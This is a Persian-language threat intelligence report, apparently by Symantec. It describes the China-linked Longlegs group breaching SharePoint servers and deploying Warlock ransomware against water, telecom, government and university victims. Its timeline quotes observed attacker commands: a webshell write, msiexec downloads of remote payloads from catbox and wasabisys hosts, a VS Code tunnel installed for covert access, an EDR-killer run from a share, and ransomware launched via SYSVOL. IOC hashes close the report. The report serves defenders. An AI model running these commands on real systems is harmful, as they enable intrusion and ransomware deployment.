یافتههای کلیدی
- Warlock نخست با سوءاستفاده از زنجیره بهرهبرداری «ToolShell» در Microsoft SharePoint مطرح شد.
- Warlock توسط یک تهدیدگر وابسته به چین که Symantec آن را Longlegs (ملقب به Storm-2603) مینامد توسعه داده میشود. Symantec پیشتر این گروه را به خوشههای فعالیت قدیمیتر با نامهای CL-CRI-1040، CamoFei و ChamelGang پیوند داده است.
- در دو ماه گذشته، Longlegs دستکم به 4 سازمان حمله کرده است؛ شامل 2 اپراتور زیرساخت حیاتی (یک شرکت خدمات آب و یک اپراتور مخابراتی)، یک نهاد دولتی منطقهای و یک دانشگاه. قربانیان در کشورهای پرتغالیزبان و اسپانیاییزبان در اروپا، آفریقا و آمریکای لاتین قرار داشتند.
- این گروه همچنان آسیبپذیریهای مرتبط با SharePoint را برای کسب دسترسی اولیه به سازمانهای هدف ترجیح میدهد.
- Longlegs از یک درایور امضاشده و آسیبپذیر (K7RKScan) سوءاستفاده میکند تا پیش از استقرار باجافزار، نرمافزارهای امنیتی را غیرفعال کند؛ همچنین مشاهده شده است که از قابلیت tunneling در Visual Studio Code برای دسترسی راهدور مخفیانه بهره میبرد.
گروه وابسته به چینِ پشت باجافزار Warlock همچنان از طریق آسیبپذیریهای Microsoft SharePoint به سازمانها نفوذ میکند؛ تاکتیکی که یک سال قبل موجب مطرحشدن آن شده بود. در دو ماه گذشته، این گروه که Symantec آن را Longlegs (ملقب به Storm-2603) رصد میکند، دستکم چهار سازمان را در کشورهای پرتغالیزبان و اسپانیاییزبان در اروپا، آفریقا و آمریکای لاتین هدف قرار داده است. قربانیان شامل دو اپراتور زیرساخت حیاتی، یعنی یک شرکت خدمات آب و یک اپراتور مخابراتی، بههمراه یک نهاد دولتی منطقهای و یک دانشگاه بودهاند.
Warlock در ژوئن 2025 پدیدار شد و چند هفته بعد زمانی خبرساز شد که مشخص گردید مهاجمانِ بهکارگیرنده آن از آسیبپذیریهای روز صفر در Microsoft SharePoint Server با نام «ToolShell» (با نام «ToolShell»، CVE-2025-49704، CVE-2025-49706، CVE-2025-53770 و CVE-2025-53771) سوءاستفاده میکنند. این نقصها بهاحتمال زیاد همچنان در زرادخانه این گروه باقی ماندهاند، در کنار نقصهای جدیدتر SharePoint که آژانس U.S. Cybersecurity and Infrastructure Security Agency (CISA) در یک هشدار منتشرشده در ژوئیه 2026 درباره آنها اخطار داده بود.
در یک نفوذ علیه یک بهرهبردار زیرساخت حیاتی، مهاجمان ظرف حدود 2 ساعت ابزاری را که برای غیرفعالسازی نرمافزارهای امنیتی طراحی شده بود به دستکم 40 میزبان توزیع کردند. سپس با قرار دادن Warlock در اشتراک SYSVOL دامنه، آن را روی دستکم 33 میزبان مستقر کردند؛ تکثیر معمول دامنه این فایل را به ماشینها رساند.
هدفگیری
تمرکز قربانیان اخیر در کشورهای پرتغالیزبان و اسپانیاییزبان قابل توجه است. فعالیت باجافزار Warlock پیشتر علیه سازمانهایی در دامنه گستردهتری از کشورها مشاهده شده است؛ از جمله ایالات متحده، برزیل، هند، روسیه، تایوان و ژاپن.
دسترسی اولیه از طریق سوءاستفاده از SharePoint
گروه Longlegs معمولاً با سوءاستفاده از چندین آسیبپذیری در استقرارهای on-premises محصول Microsoft SharePoint Server به دسترسی اولیه میرسد. پس از ورود، این گروه یک وبشل را در دایرکتوری LAYOUTS در SharePoint قرار میدهد و آن را همزمان برای چند نسخه SharePoint مستقر میکند تا مستقل از نسخهای که واقعاً نصب است کار کند. وظیفه وبشل استخراج ASP.NET machine keys مزرعه SharePoint است. مهاجمان سپس با استفاده از این کلیدها یک payload دارای امضای معتبر جعل میکنند تا اجرای کد از راه دور را درون SharePoint application pool بهدست آورند.
دورزدن دفاع و DLL sideloading
این گروه برای بارگذاری کد مخرب در حافظه از DLL sideloading استفاده میکند و payloadهای پسین را از سرویسهای مشروع اشتراکگذاری و ذخیرهسازی فایل ابری مانند catbox[.]moe و wasabisys[.]com دانلود میکند تا فعالیتهای شبکهای خود را در ترافیک عادی پنهان کند و از شناسایی بگریزد. برای غیرفعالسازی نرمافزارهای امنیتی پیش از استقرار باجافزار، گروه Longlegs از K7RKScan سوءاستفاده میکند؛ درایوری امضاشده اما آسیبپذیر (CVE-2025-1055) که میتوان از آن برای خاتمه دادن به فرایندهای حفاظتشده امنیتی در سطح هسته استفاده کرد. این رویکرد نمونه روشنی از تکنیک bring-your-own-vulnerable-driver (BYOVD) است.
استفاده از ابزارهای بومی سیستم و دسترسی راه دور پنهان
گروه Longlegs بهصورت گسترده از ابزارهای بومی سیستم برای شناسایی و اجرای فرمان روی میزبانهای بهخطرافتاده استفاده میکند. همچنین مشاهده شده است که این گروه از قابلیت tunnel داخلی در Visual Studio Code سوءاستفاده میکند؛ باینری code-insiders.exe را بهصورت یک سرویس نصب میکند تا دسترسی راه دور پنهانی بر بستر شبکه برقرار کند؛ دسترسیای که در ترافیکی که معمولاً از ایستگاههای کاری توسعهدهندگان یا مدیران سرچشمه میگیرد ادغام میشود.
استقرار باجافزار از طریق SYSVOL
برای استقرار گسترده باجافزار، گروه Longlegs بار مخرب خود را در اشتراک SYSVOL دامنهای که به مخاطره افتاده است قرار میدهد؛ مکانی که بهصورت خودکار به همه کنترلرهای دامنه تکثیر میشود و در سطح دامنه قابل خواندن است. این روش به این گروه امکان میدهد باجافزار را برای اجرا بهطور همزمان روی تعداد زیادی از ماشینهای شبکه قربانی توزیع کند، بهجای آنکه هر بار تنها یک میزبان را هدف بگیرند.
زنجیره حمله: نفوذ به یک سازمان زیرساخت حیاتی
در کارزارهای اخیر، بردار اولیه آلودگی احتمالاً بهرهبرداری از آسیبپذیریها در Microsoft SharePoint Server بوده است. نخستین فعالیت مخرب مشاهدهشده در 22 ژوئیه 2026 رخ داد؛ زمانی که یک وبشل روی سرور SharePoint (Computer 1) نصب شد:
powershell -nop -c "[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMON\microsoft shared\web server extensions\14\template\layouts\layout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"
فعالیت مخرب در 24 ژوئیه از سر گرفته شد؛ زمانی که چند فرمان شناسایی (net user /domain و whoami) روی میزبان دوم SharePoint (Computer 2) اجرا شد.
در ادامه همان روز، مهاجمان تعدادی فایل با نامهای عددی را از پروفایل Public و پوشههای ProgramData روی هر دو سیستم Computer 1 و Computer 2 حذف کردند؛ از جمله فایلی به نام doexeloc.dll. ظاهراً هدف، پاکسازی آثار مرحلهبندی اولیه بود.
اندکی بعد، مهاجمان دو فایل اجرایی با نامهای ssvagent.exe و logger.exe را در یک زیرفهرست از پوشه سیستمی Windows با مسیر CSIDL_SYSTEM\0409\ روی Computer 2 مستقر کردند و سپس آنها را به ProgramData کپی کردند. به نظر میرسید این اجراییها برای بارگذاری جانبی DLL بهکار میرفتند، زیرا دو DLL نیز همراهشان قرار داده شد (gsdll64.dll.tmp و doexeloc.dll.tmp). تقریباً همزمان، پردازه worker مربوط به SharePoint روی Computer 1 یک جفت دیگر برای بارگذاری جانبی ایجاد کرد: doexe.exe در کنار یک فایل DLL دیگر به نام doexeloc.dll. در همان مقطع، مهاجمان فرمان nltest /domain_trusts را برای فهرستکردن روابط اعتماد دامنه در Active Directory قربانی اجرا کردند.
"CSIDL_SYSTEM\nltest.exe" /domain_trusts
سه روز بعد، در 27 ژوئیه، روی Computer 2 یک درخواست وب خروجی به یک زیردامنه از oastify.com ارسال شد؛ این دامنه را سرویس شناسایی آسیبپذیری Burp Collaborator برای آزمون تعامل خارج از باند به کار میبرد:
powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://www.[TARGET_DOMAIN].{RANDOM].oastify[.]com'
نام دامنه خودِ هدف در زیردامنه Burp Collaborator گنجانده شده بود. این با رفتار یک ابزار اسکن سازگار است که برای هر هدف یک URL قناری مجزا ایجاد میکند تا تأیید کند یک میزبان مشخص کد تزریقشده را با موفقیت اجرا کرده است، نه با هیچ کاربری تجاری مشروع.
صبح 28 ژوئیه مهاجمان به Computer 2 بازگشتند تا وبشل را دوباره بیازمایند. زنجیره اکسپلویت اصلی از بعدازظهر همان روز آغاز شد. روی Computer 1 دستور PowerShell کدگذاریشده با base64 زیر اجرا شد که با فواصل زمانی منظم تکرار میشد:
"CSIDL_SYSTEM\cmd.exe" /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=')
این دستور یک assembly را بارگذاری میکند که انواع نمایانشدهٔ آن گجت سریالزدایی لازم را برای تبدیل یک payload __VIEWSTATE جعلی و با machine-key امضاشده به اجرای کد دلخواه درون application pool مربوط به SharePoint فراهم میکند. همین توالی در بعدازظهر همان روز روی Computer 2 نیز دو بار اجرا شد.
پس از برقرار شدن اجرای کد، مهاجمان به سراغ دریافت payloadهای بعدی رفتند. روی Computer 2 فرایند msiexec بهصورت پیاپی در برابر دو URL مجزا اجرا شد و 80 دقیقه بعد یک بستهٔ دیگر با نامی متفاوت نیز اجرا شد:
msiexec.exe /q /i "https://litter.catbox[.]moe/6f5tdt.msi" msiexec.exe /q /i "https://s3.wasabisys[.]com/fortifs/vamd64.msi" msiexec /q /i https://xn8xyt-drop.s3.wasabisys[.]com/xn8xyt.msi
اتکا به دو سرویس میزبانی عمومی متفاوت و سه نام بستهٔ متمایز در بازهای کمتر از 90 دقیقه نشان میدهد مهاجمان بیش از یک payload آمادهٔ اجرا داشتند و به یک نقطهٔ تحویل واحد متکی نبودند.
در ادامه نفوذ از دو سرور اولیهٔ SharePoint فراتر رفت و دامنهٔ وسیعتری را دربر گرفت. در ادامهٔ همان روز و تا روز بعد (29 ژوئیه)، مهاجمان بارها یک حساب دامنه با نام SPSEPRDSetup را به گروه محلی Administrators روی سه میزبان دیگر (Computer 3، Computer 4 و Computer 5) افزودند:
net localgroup administrators SPSEPRDSetup /add
نام حساب به احتمال زیاد تلاشی برای جعل هویت است. در SharePoint معمولاً حسابهای سرویس با نامهایی ایجاد میشوند که از الگوی دارای پیشوند SPS/SP پیروی میکنند.
روی Computer 4، مهاجمان سازوکاری متفاوت برای ماندگاری و دسترسی راه دور نصب کردند. بهجای استفاده از یک ابزار اختصاصی دسترسی راه دور، از قابلیت tunnel داخلی Visual Studio Code بهره گرفتند:
"CSIDL_WINDOWS\debug\code-insiders.exe" tunnel service install --accept-server-license-terms
به دلیل اینکه فایل اجرایی VS Code Insiders توسط Microsoft امضا شده است و تونل از زیرساخت خود Microsoft عبور میکند، این رویکرد میتواند آسانتر در ترافیک خروجیای که معمولاً از ایستگاههای کاری توسعهدهندگان یا مدیران IT انتظار میرود ادغام شود.
ساعاتی بعد در همان شب، روی Computer 2 ابزار NetExec (nxc.exe) اجرا شد؛ جانشین متنباز و فعالاً نگهداریشده چارچوب تست نفوذ CrackMapExec. از آن برای شمارش Active Directory، credential spraying و اجرای فرمان از راه دور استفاده شد؛ که نشان میدهد مهاجمان در حال نقشهبرداری از دامنه بزرگتر و حرکت درون آن بودند.
در بازه 30 ژوئیه تا ساعات اولیه 31 ژوئیه، تنها فعالیت ثبتشده، ظاهر شدن دوباره جفت doexeloc.dll/doexe.exe بهصورت side-loading روی Computer 1 بود. این رفتار با تداوم اجرای یک مؤلفه side-loaded در پسزمینه همخوانی دارد.
نفوذ در ساعات اولیه 31 ژوئیه وارد فاز نهایی شد. مهاجمان ابزار a.exe را برای از کار انداختن AV/EDR، که احتمالاً از یک درایور آسیبپذیر بهره میگرفت، با سرعت و بهصورت متوالی به چندین میزبان ارسال کردند. این کار با یک الگوی تکخطی ثابت انجام شد که یک share شبکه میزبانیشده روی یک IP داخلی را بهعنوان درایو شبکهای متصل میکرد، مجموعه ابزار محلی را از آن کپی میکرد و آن را اجرا مینمود:
" CSIDL_WINDOWS \cmd.exe" /c net use \\[IP_ADDRESS] [REMOVED] /user:[REMOVED] & copy \\[IP_ADDRESS]\av\* CSIDL_PROFILE\public /y & start /B cmd /c "c:\users\public\a.exe log 2>nul || exit"
هویت درایور آسیبپذیر نامعلوم مانده است، اما در حملات اخیر دیگر، این گروه از درایور آسیبپذیر K7RKScan استفاده کرده است. فرمانی مشابه روی Computer 4 و Computer 6 هم اجرا شد و ثبت اجرای AV/EDR Killer روی دستکم 40 میزبان دیگر طی حدود دو ساعت مشاهده شد؛ که نشان میدهد این ابزار تقریباً در سراسر محیط توزیع شده است، نه صرفاً روی چند ماشین هدفمند.
باجافزار Warlock تقریباً بهمحض آنکه حفاظت روی هر میزبان غیرفعال شد، ظاهر شد. دو باینری run.exe و rune.exe بههمراه یادداشت باج با عنوان “how to restore your files.txt” روی دستکم 33 میزبان در سراسر سازمان ثبت شدند.
"CSIDL_SYSTEM\cmd.exe" /c copy \\[REMOVED]\SYSVOL\[VICTIM DOMAIN]\scripts\run\* CSIDL_PROFILE\public /y & start /B cmd /c "c:\users\public\run.exe 2>nul || exit" & start /B cmd /c "c:\users\public\rune.exe 2>nul || exit"
قرار دادن payload در اشتراک SYSVOL دامنه ــ مکانی که بهطور خودکار به همه کنترلرهای دامنه تکثیر میشود و در سطح دامنه قابل خواندن است ــ روشی شناختهشده برای توزیع payload بهمنظور اجرا توسط logon script یا Group Policy object در کل شبکه بهصورت یکباره است، نه میزبانبهمیزبان.
دادههای سه میزبان دیگر این سازوکار را در حین اجرا بهطور مستقیم ثبت کردند. در این موارد، سرویس Distributed File System Replication (dfsrs.exe) ــ فرایندی که مسئول تکثیر SYSVOL میان کنترلرهای دامنه است ــ بهعنوان فرایند والدِ تحویلدهنده run.exe و rune.exe از همان مسیر CSIDL_WINDOWS \ SYSVOL\domain\scripts\run ثبت شد. این امر تأیید میکند که payload از طریق تکثیر معمولی SYSVOL به آن میزبانها رسیده است، نه با یک سازوکار push جداگانه.
اهمیت
تداوم فعالیت Longlegs، بیش از یک سال پس از آنکه باجافزار Warlock برای نخستین بار مطرح شد، نشان میدهد بهرهبرداری از ToolShell و سایر آسیبپذیریهای مرتبط با SharePoint همچنان یک مسیر دسترسی اولیه برای مهاجمان علیه استقرارهای SharePoint است که پچ نشده یا بهنحو دیگری کاهش ریسک نیافتهاند.
تمرکز اخیرِ مشهود بر کشورهای پرتغالیزبان و اسپانیاییزبان نشان میدهد یا با الگوی هدفگیری فرصتطلبانه و ناشی از در معرض بودن سرورهای SharePoint آسیبپذیر روبهرو هستیم، یا با مأموریتی سنجیدهتر. حضور اپراتورهای زیرساخت حیاتی در میان قربانیان یادآور پیامدهای دنیای واقعیِ حملات باجافزاری است که علیه خدمات ضروری به موفقیت میرسند.
حفاظت
راهکار Symantec CBX بهعنوان یک پلتفرم XDR یکپارچه، چندین لایه دفاعی در برابر چنین حملاتی فراهم میکند. قابلیت Adaptive Protection میتواند استفاده غیرمعمول از ابزارهای مشروع living-off-the-land (net، whoami، nltest) را بهصورت خودکار علامتگذاری و مسدود کند. قابلیت Threat Tracer در CBX نمای یگانهای از کل جریان کار مهاجم به تحلیلگران میدهد تا بتوانند جای پای اولیه را پیش از آنکه به مرحلهبندی SYSVOL در سطح دامنه ارتقا یابد، آسانتر شناسایی کنند. ویژگی Incident Prediction میتواند گامهای بعدیِ محتملِ مهاجم را پیشبینی کند و AI Security Assistant نیز رفتار مشاهدهشده را با الگوهای TTP شناختهشده باجافزار تطبیق میدهد تا تیمها پیش از آنکه Warlock در مقیاس گسترده مستقر شود، مداخله کنند. برای اطلاع بیشتر read our blog: Symantec CBX is Here.
اگر شاخص نفوذ (IOC) مخرب باشد و فایل نزد Symantec در دسترس باشد، محصولات Symantec Endpoint آن فایل را شناسایی و مسدود میکنند.
شاخصهای نفوذ
شاخصهای فایل
هش 116ca4e88a1bcebb6c0da7fb431c8eca7b8ef3f9767194820c56091972ccac2c - Warlock هش 155fb1cbdaea12c83ba92d18c88cf38bbc42bb684f913ca0bc26fcf115426a55 - Warlock هش 1edb2c0b537cd95bbd5fc16321b4c38a6adf325ccc7b588ad6acc980b0463b60 – DLL مخرب هش 206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261 - DLL مخرب هش 27b7591cf9e1283010ca98fa5dbe970a73fee0d8cde277639924c144718db7c0 - DLL مخرب هش 37f94fe1b4a106f02b6f74a69cbc05e69c17406f688beef4c9a045ffcbd2e65e – فایل مشکوک هش 6d07f1232dc59b84038fd0b2e75fdd3d5b825882bb0dba9e6724b7b0823fa3ad - Warlock هش 73c5268256c9da5488cd9e2b79013060ac321c7e54129344dc7b51e268af36ea – AV/EDR Killer هش 8b58f7811a2a2f2a5024220490473774f02759dd2dd904b5b9fabfbaae37125f - Warlock هش 8ce8d8270ee9de02644530b8dd7fa78973b4a3b80f121e2c5f45ae68cce196f9 - Warlock هش 9ceb01f8bf7d6dba2ae07f5bd6070de3ec67b5eb01f969b0ba85e74564fb83a7 – فایل مشکوک هش aaff04d84ef85353966aa4af186ff1254b72c068f33f802417b29dc23fb9f192 - فایل مشکوک هش ae9f7fce57c7b928e659dccf0e00fa79cd9cd61a106f18d4e03f92dc3a03c295 – درایور آسیبپذیر هش c46825fcc0d1bf7a8b192facb176d6bf916c9dccfd6fa994be691e3b0e585f4e – DLL مخرب هش e14240bac8277b0f6dd4d29ab5da20d246bcccae647e5fe8d19cdae7fe471b20 - DLL مخرب هش e3204b05e2f3a29bb6e6fcc21dda77d7cd31dfa755c21da0aa8661b5619ee0a1 - فایل مشکوک هش eea631b5f7125239db0811e4682c2316ead69f9822e02d94fb5d8bf0d2faebed – فایل مشکوک هش f7269f80f81e99d06a590d7ab374e12fdf7e5f55a02c2a46c342d670f8519fdf - فایل مشکوک هش fb3846c9ac53d1b841ada3a6b1091153fea41a169cb44fe0084097d1f4d45984 - DLL مخرب









